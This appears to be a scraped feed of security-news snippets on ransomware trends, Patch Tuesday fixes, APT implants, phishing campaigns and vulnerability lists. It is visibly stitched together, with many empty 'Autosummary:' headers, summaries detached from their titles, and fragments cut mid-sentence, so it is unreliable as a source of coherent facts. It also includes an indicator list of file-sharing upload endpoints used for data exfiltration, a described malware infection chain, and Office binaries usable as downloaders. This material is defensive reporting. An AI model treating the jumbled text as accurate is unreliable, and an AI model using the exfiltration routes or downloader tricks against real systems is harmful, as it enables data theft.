Common signs of botnet infections on routers include unstable connectivity, device overheating, sudden configuration changes, unresponsiveness, atypical network traffic, opening up of new ports, and unexpected reboots. "Categories: Threat Intelligence July saw one of the highest number of ransomware attacks in 2023 at 441. At the forefront of these attacks is, once again, Cl0p. |
The post Ransomware review: August 2023 appeared first on Malwarebytes Labs.
"Autosummary:
Known ransomware attacks by industry sector, July 2023 In an article published in October of last year, we speculated on the future evolution of ransomware and how, with the rise of double-extortion schemes, more and more gangs might pivot away from using encryptors entirely. One possible reason for this increase, says Chainanalysis, could be that because fewer and fewer firms are willing to pay the ransom, ransomware gangs are increasing the size of their ransom demands, the idea being to squeeze the most money possible out of the firms still willing to pay.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. This ransomware is versatile, capable of compromising Windows, Linux, and macOS systems alike. Known ransomware attacks by gang, July 2023 The LockBit gang is experiencing a steady four-month decline in the number of attacks it has carried out. "Categories: Exploits and vulnerabilities Categories: News Microsoft has announced patches for 87 vulnerabilities this month, including two that are being actively exploited. |
The post August Patch Tuesday stops actively exploited attack chain and more appeared first on Malwarebytes Labs.
"Autosummary:
or Apply the solution for the CVE manually on each server, by running the following command from an elevated PowerShell window: Clear-WebConfiguration -Filter "/system.webServer/globalModules/add[@name="TokenCacheModule"]" -PSPath "IIS:\" To roll-back the solution for the CVE manually on each server, run the following: New-WebGlobalModule -Name "TokenCacheModule" -Image "%windir%\System32\inetsrv\cachtokn.dll" Although Microsoft recommends installing the security updates as soon as possible, running the script or the commands on a supported version of Exchange Server prior to installing the updates will address this vulnerability. Other vulnerabilities that deserve some attention are six vulnerabilities in Microsoft Exchange Server including: CVE-2023-21709 (CVSS score 9.8 out of 10): a Microsoft Exchange Server Elevation of Privilege (EoP) vulnerability which could allow an attacker to login as another user. "Autosummary:
(cl.exe) F8553382DE7E1E349D8E91EDB7C57953 (cu.exe) 5137C61734E2096018CEE99149DAC009 (conhost.exe) 5660CB556D856D081A3DCD497549F47A (Rar2.exe) 976B59F170136B9C3C88BD9A8FC4CE4E (Rar3.exe) D6CC6A4AF4720DAF8EEE0835D6E5D374 (Rar4.exe) Tool used to upload files to Yandex Disk MD5 5C3A88073824A1BCE4359A7B69ED0A8D (AuditSvc.exe) Tool used to upload files to temporary file sharing services MD5 8BA9EE9FD6BD4B9304F7FB868CE975D8 (transfer.exe) IP/URL img[.]onl/api/upload.php litterbox.catbox[.]moe/resources/internals/api.php imgbb[.]com transfer[.]sh share.schollz[.]com 0x0[.]st/ Service URL address imgonl(onl) https://img[.]onl/api/upload.php litterbox(lit) https://litterbox.catbox[.]moe/resources/internals/api.php imgbb(ibb) https://imgbb[.]com/ transfer(trs) https://transfer[.]sh schollz https://share.schollz[.]com null(0x0) https://0x0[.]st/ tinyimg(tin) https://tinyimg[.]io/upload gifyu(gif) https://gifyu[.]com/ imgshare(ims) https://imgshare[.]io/ imgpile(imp) https://imgpile[.]com/ zippyimage(zip) https://zippyimage[.]com/ extraimage(ext) https://extraimage[.]info/ picpaster(pic) https://upload.picpaste[.]me/ imaurupload(imu) https://imgurupload[.]org sm.ms(sms) https://sm[.]ms/api/v2/upload easycaptures(esy) https://easycaptures[.]com/upload_file_new.php Along with various parameters designed for flexibility and optimization, the tool can generate and use a client-side RSA key. Third-step implant variant sending “.rar” files to some local C2 Later, the threat actor deployed a new variant of the second-step implant, whose capabilities included looking up file names in the Outlook folder (i.e., email account names), executing remote commands and uploading local or remote “.rar” files to Dropbox by calling the third-step implant. The entire stack of implants used in attacks can be divided into three categories based on their roles: First-stage implants for persistent remote access and initial data gathering Second-stage implants for gathering data and files, including from air-gapped systems Third-stage implants and tools used to upload data to C2 In this part we present information on the four types of implants and two tools used during the last (third) stage of the attacks discovered. Second-step implant starts a third-step implant (named “cl.exe”) to upload “.rar” files to Dropbox It should be noted that before calling the third-step implant to upload files, the second-step implant prepends a custom header to each “.rar” file. JSON log produced by the tool The threat actor most probably used the tool manually or semi-manually to upload logs and other files to file sharing services, while the resulting JSON containing URLs could be uploaded by any of the first-stage implants described in the first part of the article or by the implant designed to send a single file, “111.log”, as an email attachment via the Yandex email service (that implant is described below). Using some unknown tool to check privileges to access a remote host To upload local files, the second-step implant calls a third-step implant, which is supposed to be already deployed on the machine either at the statically defined path “c:/users/public/” or at the same path as the second-step implant. "Cybersecurity has witnessed exponential growth in recent years, fueled by the increasing sophistication of cyber threats. As the demand for skilled professionals continues to surge, traditional approaches to education and job requirements are being challenged. In this article, I will explore the paradigm shift in the cybersecurity industry toward embracing practical expertise and hands-on experience over a formal college degree. I will examine the reasons behind this shift and its benefits for aspiring cybersecurity professionals … More
The post Why cybersecurity is a blue-collar job appeared first on Help Net Security.
"Autosummary:
Not to say they ever were, but the days of expecting candidates to possess a wide range of skills, such as network security experience, system security administration, application design, and forensics are no longer realistic. By shifting our focus toward practical skills and hands-on experience, we can recognize the accessibility of coding, engineering, and cybersecurity training beyond the confines of traditional college degrees. "With the increasing complexity of cyber threats and the global shortage of cybersecurity experts, organizations are looking for creative approaches to recruiting and retaining top talent. In this Help Net Security interview, Jon Check, Executive Director of Cybersecurity Protection Solutions at Raytheon, sheds light on the significance of internships and apprenticeships in nurturing the next generation of cyber defenders. How do internships and apprenticeships contribute to bridging the theoretical and practical divide in the cybersecurity … More
The post Using creative recruitment strategies to tackle the cybersecurity skills shortage appeared first on Help Net Security.
"Autosummary:
This can include cyber competitions that enable students to gain hands-on experience, test their skills, network, and connect with mentors, laying a critical foundation to prepare themselves for a career in cyber (i.e., National Collegiate Cyber Defense Competition and US Cyber Games). Leaders must first reframe their mindset around what makes a qualified cyber defender, beyond checking specific boxes (i.e., specific degrees from prestigious colleges) and extending it to focus on soft skills, including critical thinking, problem-solving, and public speaking. "Ransomware shows no signs of slowing, with ransomware activity ending 13 times higher than at the start of 2023 as a proportion of all malware detections, according to Fortinet. Ransomware detections 1H 2023 FortiGuard Labs has documented substantial spikes in ransomware variant growth in recent years, largely fueled by the adoption of Ransomware-as-a-Service (RaaS). However, FortiGuard Labs found that fewer organizations detected ransomware in the first half of 2023 (13%) compared to this time five … More
The post The ransomware rollercoaster continues as criminals advance their business models appeared first on Help Net Security.
"Autosummary:
Botnets lingering in networks longer than ever While the report finds more active botnets (+27%) and a higher incidence rate among organizations over the last half-decade (+126%), one of the more shocking findings is the exponential increase in the total number of “active days”, which FortiGuard Labs defines as the amount of time that transpires between the first hit of a given botnet attempt on a sensor and the last.FortiGuard Labs continues to observe wipers being used by nation-state actors, although the adoption of this type of malware by cybercriminals continues to grow as they target organizations in technology, manufacturing, government, telecommunications, and healthcare sectors. "A series of ransomware attacks made by different groups share curiously similar characteristics, according to Sophos. Sophos released new findings into the connections between the most prominent ransomware groups this past year, including Royal, in its Clustering Attacker Behavior Reveals Hidden Patterns report. Distinct similarities found in recent ransomware attacks Over the course of three months beginning in January 2023, Sophos X-Ops investigated four different ransomware attacks, one involving Hive, two by Royal, and one … More
The post Recent ransomware attacks share curiously similar tactics appeared first on Help Net Security.
"Autosummary:
Distinct similarities found in recent ransomware attacks Over the course of three months beginning in January 2023, Sophos X-Ops investigated four different ransomware attacks, one involving Hive, two by Royal, and one by Black Basta, and noticed distinct similarities between the attacks. "Autosummary:
"Autosummary:
"They primarily attack education, government, manufacturing, and technology and managed service provider sectors; however, there have been recent attacks against the Healthcare and Public Health (HPH) sector," the U.S. Department of Health and Human Services" Health Sector Cybersecurity Coordination Center said in an alert last week. "Autosummary:
Cloud-based databases, network services, firmware, specific individual devices, storage systems, servers, and web-based apps can each contribute to either the safety or vulnerability of an overall system’s robust security program. Using a combination of specialist in-house expertise along with our proprietary automation platform and attack surface analysis tools, we can provide everything from a single point-in-time risk analysis to longer-term planning, execution, and metrics collection as you work to reduce your exposure to Internet-based attacks.The IoT provides enhanced AI-enabled communication between a wide variety of devices, including mobile phones, wearable devices, industrial sensors, and actuating ports, which convey information through cloud storage databases. This type of attack offers a wide range of potential for manipulating and extorting healthcare organizations, whose databases contain an abundant of sensitive information about patient medical histories, current health records, home addresses, and financial details. "Autosummary:
EvilProxy phishing attack flow Source: Proofpoint As reported in September 2022 by Resecurity, EvilProxy is sold to cyber criminals for $400/month, promising the ability to target Apple, Google, Facebook, Microsoft, Twitter, GitHub, GoDaddy, and PyPI accounts. "NetRise announced advanced capabilities for maintaining and working with Software Bill of Materials (SBOMs) and support for the CISA’s KEV Catalog for managing and understanding the risks associated with software components in the firmware of connected devices. As the security of the software and firmware supply chain and regulation around SBOMs continue to dominate the industry landscape, the impact of consuming and generating a list of ‘ingredients’ for each device cannot be overstated. With the … More
The post NetRise unveils SBOM and vulnerability prioritization solutions to enhance XIoT firmware security appeared first on Help Net Security.
"Autosummary:
“Our goal is to alleviate the significant struggles that manufacturers, enterprises, and consultants globally face today when securing XIoT software and firmware, not only when building these products but also understanding the latent risk and impact of the latest exploitable vulnerability on devices in the field,” said Thomas Pace, CEO of NetRise. "Dynatrace introduced Security Analytics, a new Dynatrace platform solution designed to help organizations better defend against threats to their hybrid and multicloud environments. Dynatrace Security Analytics leverages Davis AI, which combines predictive and causal AI techniques to provide security analysts with the precise answers and data context they need to prioritize and investigate threats and vulnerabilities. Later this year, Security Analytics will also include generative AI capabilities as part of Dynatrace’s planned expansion to provide … More
The post Dynatrace Security Analytics detects and blocks common application attacks appeared first on Help Net Security.
"Autosummary:
Today’s security analytics platforms combine features to enable analytics, investigation, automation, threat hunting, dashboards, and reporting to help security analysts be more effective.” "Autosummary:
"The information involved in this incident may include an individual"s name, department client number (DCN), date of birth, possible benefit eligibility status or coverage, and medical claims information," explains the DSS notification. "Autosummary:
Directories excluded from encryption Source: Cisco CheckPoint"s report goes a step further, linking Rhysida to the now-defunct Vice Society ransomware operation, based on the victim publishing times on the two extortion sites and their similar victim targeting patterns.. Comparison of activity change in Vice Society and Rhysida (CheckPoint) In conclusion, Rhysida has established itself in the ransomware space quickly, targeting organizations in various sectors and showing no hesitation in attacking hospitals. At the time, a preliminary analysis of the Rhysida encryptor by SentinelOne showed that the ransomware was in early development, missing standard features seen in most strains like persistence mechanisms, Volume Shadow Copy wiping, process termination, etc. "This is an automated alert from cybersecurity team Rhysida," reads the Rhysida ransom note. "Autosummary:
Sample of the malicious email Source: CERT-UA The emails carry a CHM file attachment that, if opened, executes JavaScript code which in turn runs a PowerShell script that fetches, decrypts, and decompresses a GZIP archive that contains the executable "ctlhost.exe." If the recipient runs this executable, their computer gets infected by MerlinAgent, giving the threat actors access to their machine, data, and a foothold to move laterally in the network. "Categories: News Tags: Cloudflare Tunnel Tags: cloudflared Tags: rdp Tags: hxxps Tags: smb Tags: ssh Researchers have found that cybercriminals are shifting to Cloudflare Tunnel to hide and anonymize their nefarious activities. |
The post Cloudflare Tunnel increasingly abused by cybercriminals appeared first on Malwarebytes Labs.
"Autosummary:
Cloudflare Tunnel, also known by its executable name, Cloudflared, reaches out to the Cloudflare Edge Servers by creating an outbound connection over HTTPS(HTTP2/QUIC), where the tunnel’s controller makes services or private networks accessible via Cloudflare console configuration changes.It’s used to allow external sources to directly access important services, including SSH (Secure Shell), RDP (Remote Desktop Protocol), SMB (server Message Block), and others.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. "Though typically seen as a final measure, 90% of participants from a BigID survey revealed that their company would contemplate paying a ransom if it meant they could recover data and business processes, or recover them faster. In this Help Net Security interview, Azeem Aleem, MD of UK and Northern Europe at Sygnia, unravels the complexities of ransomware negotiation and highlights the measures that organizations can take to protect themselves against cyber threats. Can you … More
The post Getting the best possible outcome in ransomware negotiation appeared first on Help Net Security.
"Autosummary:
It’s an incredibly unique team with honed skills in technological supremacy, digital combat, data analytics, and business, to deliver military-grade security to organizations – in fact, one that nations quietly turn to for help.For example at Sygnia, we hand-pick the cream of the crop in talent from ranks of elite military technology units and the cyber industry such as ex-military intelligence officers, criminal psychologists, hostage-turned-ransomware hacking negotiators, and more. If your business is under attack, the threat actor can use it as an opportunity to ‘drip-feed,’ extortions, promising to release data in a staggered approach to ensure they get the most out of their attack.The negotiation team will work to uncover the motives of the attacker, investigate the source, contain the threat, minimise the breach exposure time (BET) and then help to remediate and recover as a way to break the cycle of threats. "In this Help Net Security video, Jim Simpson, Director of Threat Intelligence at Searchlight Cyber, discusses threats against the financial sector. Threat actors will invariably target banks, yet by keeping an eye on the dark web, these institutions can identify illegal activities during their initial planning or pre-attack phase. This grants security teams crucial time to modify their defensive strategies accordingly.
The post Dark web activity targeting the financial sector appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" The development also follows a major spike in ransomware attacks, with Malwarebytes recording as many as 1,900 incidents over the past year within the U.S., Germany, France, and the U.K., mainly fueled by the "ascension of the Cl0p group – which has effectively harnessed zero-day vulnerabilities to amplify its attacks. "Autosummary:
Therefore, all UK voters should be on the lookout for targeted phishing emails attempting to gather further sensitive information, such as passwords, account numbers, or financial information. "The XDR Alliance released a new set of open-source API specifications that help leading cybersecurity vendors collaborate and integrate their technology solutions. As a result, end user customer organizations worldwide can rationalize their disparate and previously siloed cybersecurity solutions, enabling them to more easily operationalize broader coverage for threat detection, investigation, and response (TDIR) use cases. Customers can extract more value from their existing technology tools and avoid proprietary approaches from portfolio vendors. On average, … More
The post XDR Alliance unveils open-source API specifications to improve cybersecurity for customers appeared first on Help Net Security.
"Autosummary:
The APIs have been developed in collaboration with member organizations earning domain expertise across endpoint, network, cloud, identity, email security, security analytics, security log management, SIEM, and more to provide the most in-depth security coverage for organizations. “In cybersecurity, the network is a key source of truth, shining a light on all traffic: malicious, mundane, and everything in between,” said Phil Shigo, VP, Business Development, ExtraHop. "North Korean state-sponsored hackers have breached Russian missile maker NPO Mashinostroyeniya, according to SentinelLabs researchers. North Korean hackers discovered The researchers came across leaked email communication between NPO Mashinostroyeniya’s IT staff that contained information about a possible cyber intrusion first detected in May 2022. According to the emails, the breached company’s IT staff discovered a suspicious DLL file within company systems, which SentinelLabs researchers identified as a version of the OpenCarrot Windows OS backdoor previously … More
The post North Korean hackers breached Russian missile development firm appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
The number of bugs in each vulnerability category is listed below: 18 Elevation of Privilege vulnerabilities 3 Security Feature Bypass vulnerabilities 23 Remote Code Execution vulnerabilities 10 Information Disclosure vulnerabilities 8 Denial of Service vulnerabilities 12 Spoofing vulnerabilities These counts do not include twelve Microsoft Edge (Chromium) vulnerabilities fixed earlier this month. "Autosummary:
"August 2023 Patch Tuesday is here; among the 76 CVE-numbered issues fixed by Microsoft this time around is a DoS vulnerability in .NET and Visual Studio (CVE-2023-38180) for which proof-of-exploit code exists. Other than the fact that a patch is available, practically no other information has been shared by the company about CVE-2023-38180. Vulnerabilities in Microsoft Office and Exchange Server There is a Microsoft Office “Defense in Depth Update” available that, according to Microsoft, stops … More
The post August 2023 Patch Tuesday: Microsoft fixes critical bugs in Teams, MSMQ appeared first on Help Net Security.
"Autosummary:
“While MSMQ is not enabled by default and is less common today, any device with it enabled is at critical risk,” noted Automox CISO Jason Kikta, and pointed users towards a Worklet that can help users check to see if the service is enabled and listening on TCP port 1801, stop the service and disable it from starting, and create an inbound firewall block rule for TCP port 1801 to prevent exploitation attacks over the network. "Categories: Threat Intelligence Tags: malvertising Tags: nft Tags: crypto Tags: wallet Tags: bing Tags: google NFT enthusiasts are getting their wallets drained after clicking on a malicious ad. |
The post Digital assets continue to be prime target for malvertisers appeared first on Malwarebytes Labs.
"Autosummary:
They are redirected to a second website (www-market-lookshare[.]com) that was also registered very recently and that acts as the phishing site: This site is a close replica of the official looksrare[.]org domain: Draining wallets The phishing site invites victims to connect their wallet by scanning a QR code: If you are running the Coinbase extension, you will get a request such as the one below: After connecting to the victim"s wallet, the threat actor will run a few queries and eventually prompt the user to sign a message, granting them access to their NFTs. "Autosummary:
"In this Help Net Security interview, we delve into the world of cybersecurity with Michael Adams, the CISO at Zoom. Adams analyzes how organizations grapple with the effects of workforce shortages and remote work complications, offering insights into best practices for safeguarding products and services in this challenging era. As a result of the Great Resignation, many organizations are dealing with workforce shortages and the challenges of remote work. Can you elaborate on how these … More
The post Zoom CISO Michael Adams discusses cybersecurity threats, solutions, and the future appeared first on Help Net Security.
"Autosummary:
As with any emerging threat vector, organizations need to have solid defenses in place, including anti-phishing software, MFA, and endpoint detection. For companies seeking to address a workforce shortage, it’s crucial to invest in automated threat detection systems, adopt flexible yet secure technologies, and encourage continuous learning among existing staff. "Government organizations are attractive targets for threat actors whose motivations may be geopolitical, financial, or disruption, according to BlackBerry. Because threat actors may include private individuals, small groups, or state-sponsored APT groups (which use APT tactics), government organizations must defend against a wide range of threats. Governments and public services under cyberattacks With limited resources and often immature cyber defense programs, these publicly funded organizations are struggling against the double-pronged threat of attacks from both … More
The post Budget constraints threaten cybersecurity in government bodies appeared first on Help Net Security.
"Autosummary:
"Ransomware remains a lucrative tool for cybercriminals as attackers continue to target a wide array of businesses. In response to this growing threat, an increasing number of organizations are compelled to meet ransom demands, perceiving it as their only viable course of action. In this Help Net Security video, Jordan Schroeder, Managing CISO at Barrier Networks, discusses ransomware payment practices.
The post Navigating the gray zone of ransomware payment practices appeared first on Help Net Security.
"Autosummary:
"The line between physical and digital safety continues to blur, making cybersecurity a universal concern. The intricacies of cybersecurity can often feel esoteric, leaving many outside the industry feeling daunted. However, with increasing resources becoming available, getting a handle on cybersecurity is more attainable than ever before. Here’s a list of eight free cybersecurity documentaries that shine a light on cybercrime and the digital defense industry. A hacker shares his biggest fears (2021) A white … More
The post 8 free cybersecurity documentaries you can watch right now appeared first on Help Net Security.
"Autosummary:
Look behind the cheerful veneer of social media, communication apps, and platforms that have made our lives easier and more connected, and you’ll find criminals using the same apps and platforms to run illicit and dangerous activities. "Autosummary:
"Criminals coach victims through the investment process, show them fake profits, and encourage victims to invest more," the FBI said. "Horizon3.ai researchers have published some details (but no PoC for now, thankfully!) about CVE-2023-39143, two vulnerabilities in PaperCut application servers that could be exploited by unauthenticated attackers to execute code remotely. But, they noted, unlike the PaperCut vulnerability (CVE-2023-27350) recently leveraged by Clop and LockBit ransomware affiliates, CVE-2023-39143 is not a “one-shot” RCE bug. “CVE-2023-39143 is more complex to exploit, involving multiple issues that must be chained together to compromise a server,” they pointed out. … More
The post PaperCut fixes bug that can lead to RCE, patch quickly! (CVE-2023-39143) appeared first on Help Net Security.
"Autosummary:
But, they noted, unlike the PaperCut vulnerability (CVE-2023-27350) recently leveraged by Clop and LockBit ransomware affiliates, CVE-2023-39143 is not a “one-shot” RCE bug. "Autosummary:
"Autosummary:
The backdoor supports a total of 25 commands, including: Reconnaissance: File and process attribute enumeration, scanning, and ICMP-pinging hosts in IP ranges for open TCP ports and availability. "Autosummary:
Targeted browsers and crypto wallets include Brave, Google Chrome, Microsoft Edge, Opera, Opera GX, Opera Crypto, Yandex Browser, Atomic, Dash Core, Electron Cash, Electrum, Electrum-LTC, Ethereum Wallet, Exodus, Jaxx Liberty, Litecoin Wallet, and Mincoin. "Autosummary:
"Categories: Exploits and vulnerabilities Categories: News Tags: Zoho ManageEngine Tags: CVE-2021-40539 Tags: Log4Shell Tags: CVE-2021-44228 Tags: CVE-2021-13379 Tags: ProxyShell Tags: CVE-2021-34473 Tags: CVE-2021-31207 Tags: CVE-2021-34523 Tags: CVE-2021-26084 Tags: Atlassian Tags: CVE-2022-22954 Tags: CVE-2022-22960 Tags: CVE-2022-26134 Tags: CVE-2022-1388 Tags: CVE-2022-30190 Tags: Follina What can the routinely exploited vulnerabilities of 2022 tell us, and what do we think will make it on to next year"s list? |
The post 2022"s most routinely exploited vulnerabilities—history repeats appeared first on Malwarebytes Labs.
"Autosummary:
CVE-2022-22954, CVE-2022-22960 are two vulnerabilities that can be chained to allow Remote Code Execurion (RCE), privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. ProxyShell is a combination of three vulnerabilities in Microsoft Exchange Server (CVE-2021-34473, CVE-2021-31207, and CVE-2021-34523) that can be chained together to allow a remote attacker to break in, take control, and then do bad things on an unpatched server. "Autosummary:
If you are sick of the warnings or just want better security, even though you may have reduced privacy, you can enable the feature by following these steps: Open your Google Account. "Autosummary:
"Autosummary:
"Reptile is a Linux kernel mode rootkit malware that provides a concealment feature for files, directories, processes, and network communications," ASEC said. "Autosummary:
The stolen information includes full names, social security numbers, dates of birth, addresses, proof of addresses (statements/bills), photocopies of government IDs, and for some, police reports or complaints regarding identity theft. "Autosummary:
According to security researcher Dominic Alvieri, who first spotted this new tactic, torrents have been created for twenty victims, including Aon, K & L Gates, Putnam, Delaware Life, Zurich Brazil, and Heidelberg. "As the healthcare industry continues its rapid transformation through the adoption of digital technologies, it is also confronted with an ever-expanding range of cybersecurity threats. In this Help Net Security interview, Dr. Omar Sangurima, Principal Technical Program Manager at Memorial Sloan Kettering Cancer Center, discusses the impact of cyberattacks on patient safety and care delivery, emphasizing how disruptions to critical healthcare services can harm patients and even lead to life-threatening situations. Can you discuss the … More
The post The direct impact of cyberattacks on patient safety and care delivery appeared first on Help Net Security.
"Autosummary:
For example, when a healthcare organization is hit with a cyberattack, the attackers may gain access to sensitive patient data, including personal information, medical histories, and even financial information. In this Help Net Security interview, Dr. Omar Sangurima, Principal Technical Program Manager at Memorial Sloan Kettering Cancer Center, discusses the impact of cyberattacks on patient safety and care delivery, emphasizing how disruptions to critical healthcare services can harm patients and even lead to life-threatening situations. In a word, visibility, or lack thereof, leads to a lack of control over the organization’s security environment, making it challenging to identify and respond to threats in a timely manner.However, these are sadly exceedingly rare, and what we are left with in most cases are instances where there was absolutely something an organization could have done to mitigate a breach, or at the very least, lessen the impact when one occurred. "Autosummary:
"Autosummary:
"Threat actors rely on the ‘versioning’ technique to evade malware detections of malicious code uploaded to the Google Play Store. Google Cybersecurity Action Team (GCAT) revealed that threat actors are using a technique called versioning to evade malware detection implemented to detect malicious code uploaded to the Google Play Store. The technique is not new […]
The post Attackers use dynamic code loading to bypass Google Play store’s malware detections appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, malware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "CISA, the FBI, and NSA, along with Five Eyes cybersecurity agencies published a list of the 12 most exploited vulnerabilities of 2022. CISA, the NSA, and the FBI, in collaboration with cybersecurity authorities from Australia, Canada, New Zealand, and the United Kingdom, have published a list of the 12 most exploited vulnerabilities of 2022. The […]
The post CISA, FBI, and NSA published the list of 12 most exploited vulnerabilities of 2022 appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Cybersecurity agencies from member countries of the Five Eyes intelligence alliance have released a list of the top 12 vulnerabilities routinely exploited in 2022, plus 30 additional ones also “popular” with attackers. The top 12 “In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems. Proof of concept (PoC) code was publicly available for many of the software vulnerabilities or vulnerability chains likely facilitating exploitation … More
The post Top 12 vulnerabilities routinely exploited in 2022 appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The development comes more than a year after Ilya Lichtenstein, 35, and his wife, Heather Morgan, 33, were arrested in February 2022, following the seizure of roughly 95,000 of the stolen crypto assets that were held by the defendants. "Autosummary:
"Autosummary:
When filing a complaint, victims are encouraged to provide crucial details, including links, social media accounts, crypto accounts, or domains associated with the scam, and to include the NFTHack keyword to make it easier to keep track of reports linked to this type of scam. "Autosummary:
Additionally, apps are strictly prohibited from downloading executable code (such as dex, JAR, or .so files0 from external sources to the official Android App Store. "Categories: Business Categories: News Tags: Microsoft Teams Tags: social engineering Tags: bypass Tags: MFA Tags: authenticator Attackers are using Microsoft Teams chats from compromised Microsft 365 tenants as credential theft phishing lures |
The post Microsoft Teams used in phishing campaign to bypass multi-factor authentication appeared first on Malwarebytes Labs.
"Autosummary:
The targeted organizations are mostly found among government, non-government organizations (NGOs), IT services, technology, discrete manufacturing, and media sectors. According to Microsoft the attackers are part of the same group that was behind the attacks against SolarWinds, the Sunburst backdoor, TEARDROP malware, GoldMax malware, and other related components. In the phishing attacks the group leverages previously compromised Microsoft 365 instances, mostly owned by small businesses, to create new domains that look like technical support accounts. "A cyberattack has disrupted the computer systems of multiple hospitals in several states, with a severe impact on their operations. Some emergency rooms in multiple hospitals in several states were forced to close and ambulances were diverted due to a cyberattack against their networks. The cyberattack hit hospitals operated by Prospect Medical Holdings, which are […]
The post A cyberattack impacted operations of multiple hospitals in several US states appeared first on Security Affairs.
"Autosummary:
Officials confirmed that a malware infected some systems of the hospital’s IT infrastructure Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Hospitals) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @billtoulas, @Seifreed, @malwrhunterteam, @demonslay335, @serghei, @malwareforme, @LawrenceAbrams, @BleepinComputer, @Ionut_Ilascu, @Fortinet, @malvuln, @Intel_by_KELA, @DragosInc, @MrJamesSullivan, @pcrisk, and @juanbrodersen. Other ransomware operations with ESXi encryptors include Akira, Royal, Black Basta, LockBit, BlackMatter, AvosLocker, REvil, HelloKitty, RansomEXX, and Hive. "Amid a recent uptick in cybercrime on local governments, cities have been left to recover for months after the initial attack. For example, leaders in Dallas, Texas are ready to spend months recovering from an attack that hindered the city’s 911 emergency services, court systems, and more. As more local governments have adopted cloud technology, more entry points have opened up for bad actors to attack. In this Help Net Security video, Ben Sebree, Senior … More
The post How local governments can combat cybercrime appeared first on Help Net Security.
"Autosummary:
"With the rise of ML, traditional red teams tasked with probing and exposing security vulnerabilities found themselves facing a new set of challenges that required a deep and comprehensive understanding of machine learning. Google’s recent announcement about the formation of a dedicated AI Red Ream has raised curiosity and interest within the tech community. In this Help Net Security interview, Daniel Fabian, Head of Google Red Teams, shares insights into the significance of his team, … More
The post Google’s AI Red Team: Advancing cybersecurity on the AI frontier appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Daniel Fabian, Head of Google Red Teams, shares insights into the significance of his team, the challenges they face, and the impact they are making in securing AI-driven technologies. At the beginning of an exercise, the AI red team sets up a scenario, describing who the simulated attacker is, what their capabilities are, and what goals they would like to achieve. "Autosummary:
" Microsoft said the campaign, observed since at least late May 2023, affected less than 40 organizations globally spanning government, non-government organizations (NGOs), IT services, technology, discrete manufacturing, and media sectors. "Autosummary:
"An APT group linked to Russia’s Foreign Intelligence Service has hit employees of several dozen global organizations with phishing attacks via Microsoft Teams, says Microsoft. A social engineering attack to bypass MFA protection “To facilitate their attack, the actor uses Microsoft 365 tenants owned by small businesses they have compromised in previous attacks to host and launch their social engineering attack. The actor renames the compromised tenant, adds a new onmicrosoft.com subdomain, then adds a … More
The post Russian APT phished government employees via Microsoft Teams appeared first on Help Net Security.
"Autosummary:
Microsoft says that the targets in this campaign were government and non-government organizations, and organizations in the IT services, technology, discrete manufacturing, and media sectors. "Ivanti has disclosed a critical vulnerability (CVE-2023-35082) affecting old, out-of-support versions of MobileIron Core, an enterprise device solution that has since been rebranded to Ivanti Endpoint Manager Mobile (EPMM). “The vulnerability was incidentally resolved in MobileIron Core 11.3 as part of work on a product bug. It had not previously been identified as a vulnerability,” noted Ivanti. About the vulnerability (CVE-2023-35082) CVE-2023-35082 is a remote unauthenticated API access vulnerability that, if exploited, could allow an … More
The post Ivanti discloses another vulnerability in MobileIron Core (CVE-2023-35082) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Its LinkedIn profile lists "Operation Israel" as an ongoing project since June 2022, claiming it supports Palestine, that the "Israeli Government killing & torturing Palestine people"s," and that "we will attacking their cyberspace until they stop killing Palestine People"s. "Autosummary:
Microsoft Office executable files source: Pentera He tested all of them manually and found three - MsoHtmEd.exe, MSPub.exe, and ProtocolHandler.exe - that could be used as downloaders for third-party files, thus fitting the LOLBAS criteria. Microsoft Office binaries The LOLBAS project currently lists over 150 Windows-related binaries, libraries, and scripts that can help attackers execute or download malicious files or bypass lists of approved programs. "Autosummary:
Microsoft Exchange Server Elevation of Privilege CVE-2021-40539 Zoho ADSelfService Plus RCE/Auth Bypass CVE-2021-26084 Atlassian Confluence Server/Data Center Arbitrary code execution CVE-2021- 44228 (Log4Shell) Apache Log4j2 RCE CVE-2022-22954 VMware Workspace ONE RCE CVE-2022-22960 VMware Workspace ONE Improper Privilege Management CVE-2022-1388 F5 Networks BIG-IP Missing Authentication CVE-2022-30190 Microsoft Multiple Products RCE CVE-2022-26134 Atlassian Confluence Server/Data Center RCE The first spot goes to CVE-2018-13379, a Fortinet SSL VPN vulnerability the company fixed four years ago, in May 2019. "Autosummary:
One campaign targets multiple banks, payment providers, email service providers, crypto exchange platforms, VPNs, and cloud service providers, using injection scripts, mainly focusing on users in Australia and the United Kingdom. Infection chains for three Rilide campaigns Source: Trustwave Regardless of the distribution campaign, upon installation, the extension communicates with the attackers" server and receives one of the following commands: extension – Enable or disable an extension from list of installed extensions. Rilide is a malicious browser extension for Chromium-based browsers, including Chrome, Edge, Brave, and Opera, that Trustwave SpiderLabs initially discovered in April 2023. "Autosummary:
"Autosummary:
Finally, Killnet has attempted to extort victims into paying ransom to stop DDoS attacks or delete stolen data, like in the case of RuTor in August 2022, BlackSprut in November 2022, the Latvian government in November 2022, and NATO in April 2023. Killnet set up a hack-for-hire service in March 2023, announced a new DDoS-for-hire service in July 2023, and launched a "Dark School" training program selling nine hacking courses to interested hackers in May 2023. "Autosummary:
